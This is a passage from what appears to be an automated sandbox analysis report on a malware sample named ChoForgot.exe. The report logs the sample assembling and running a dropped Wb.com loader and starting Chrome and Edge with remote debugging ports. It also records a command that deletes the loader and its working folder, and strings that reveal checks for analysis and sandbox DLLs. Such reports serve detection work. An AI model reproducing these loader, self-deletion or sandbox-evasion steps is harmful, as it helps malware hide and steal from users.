                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes fJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\623615\Wb.com Wb.com fJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\MO8GVA1VKF37" & exitJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6536 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2220,i,9483855011008134585,3632144003053426118,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=2552,i,9281795013285619816,5937589130455718843,262144 /prefetch:3Jump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6536 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6584 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6896 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\ChoForgot.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: ChoForgot.exeStatic file information: File size 1111393 > 1048576
                Source: ChoForgot.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: ChoForgot.exeStatic PE information: real checksum: 0x119f67 should be: 0x112cbb
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD0DE6 push ecx; ret 12_2_00FD0DF9

                Persistence and Installation Behavior

                barindex
                Drops PE files with a suspicious file extension
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\623615\Wb.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\623615\Wb.comJump to dropped file

                Boot Survival

                barindex
                Monitors registry run keys for changes
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_010426DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_010426DD
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FCFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00FCFC7C
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_12-103420
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: Wb.com, 0000000C.00000003.2355096916.0000000001C94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: Wb.com, 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: LAPI_LOG.DLLPS
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comAPI coverage: 3.8 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 5776Thread sleep count: 90 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0101DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0101DC54
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0102A1E2
